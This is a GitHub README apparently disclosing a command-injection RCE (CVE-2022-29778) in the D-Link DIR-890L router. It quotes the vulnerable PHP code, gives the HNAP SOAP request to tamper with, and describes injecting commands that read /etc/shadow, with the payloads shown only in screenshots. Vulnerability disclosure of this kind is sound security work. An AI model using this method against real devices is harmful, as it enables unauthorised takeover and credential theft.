Skip to content
/ DIR-890L-1.20-RCE Public

Analysis and PoC for D-Link DIR-890L RCE (CVE-2022-29778)

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

TyeYeah/DIR-890L-1.20-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
files
files
 
 
pic
pic
 
 
video
video
 
 
README.md
README.md
 
 

Repository files navigation

D-Link DIR-890L RCE

Affected Version: <= v1.22B01 Hotfix (latest)

Firmware: Here

This model has reached the end of its life-cycle. The resources associated with these products have ceased their development and are no longer supported. D-Link Systems, Inc. recommends retiring these products and replacing them with products that receive firmware updates.

Vulnerability

In its firmware we can find a function getWOLMAC in SetVirtualServerSettings.php

function getWOLMAC($ipv4addr)
{
	$cmd = "scut -p ".$ipv4addr." -f 3 /proc/net/arp";
	setattr("/runtime/wakeonlan/mac", "get", $cmd);
	$mac = get("", "/runtime/wakeonlan/mac");
	del("/runtime/wakeonlan/mac");
	return $mac;
}

The $cmd concatenates $ipv4addr directly into command without filtering, and it is called at

		$ipv4addr = get("x", "LocalIPAddress");
        ...
		if($description == "Wake-On-Lan")
		{
			$wolmac = getWOLMAC($ipv4addr);
			set($vsvr_entry.":".$InDeX."/wakeonlan_mac", $wolmac);
		}

So When you set $description (corresponding to virtual server name) as "Wake-On-Lan", there may exist RCE(remote command execution) in Virtual Server related pages: /VirtualServer.html.

Exploit

  • It requires authentication, so log in first. Login Home

  • Then visit Virtual Server page (/VirtualServer.html) which is inaccessible through panel. Virtual Server

  • Add a rule named Wake-On-Lan. Add rule Rule results

  • Start burpsuite before click Save button and capture the following packet: packet

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetVirtualServerSettings"
HNAP_AUTH: A4A816AE6CF2AC5537B0EB390FFB591C 1436839665
Content-Length: 765
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/VirtualServer.html
Cookie: uid=ZeNYZag3Gw

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetVirtualServerSettings>
			<VirtualServerList>
				<VirtualServerInfo>
					<Enabled>true</Enabled>
					<VirtualServerDescription>Wake-On-Lan</VirtualServerDescription>
					<ExternalPort>1</ExternalPort>
					<InternalPort>1</InternalPort>
					<ProtocolType>TCP</ProtocolType>
					<ProtocolNumber>6</ProtocolNumber>
					<LocalIPAddress>192.168.0.100</LocalIPAddress>
					<ScheduleName></ScheduleName>
				</VirtualServerInfo>
			</VirtualServerList>
		</SetVirtualServerSettings>
	</soap:Body>
</soap:Envelope>

  • Prepare a http server then:
    python server

  • Use Repeater module to test RCE(remote command execution): burpsuite

  • And we get: result

  • Test commands injection and read /etc/shadow: command ls /busy/box result command ls /busybox -al result command cat /etc/shadow result

About

Analysis and PoC for D-Link DIR-890L RCE (CVE-2022-29778)

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages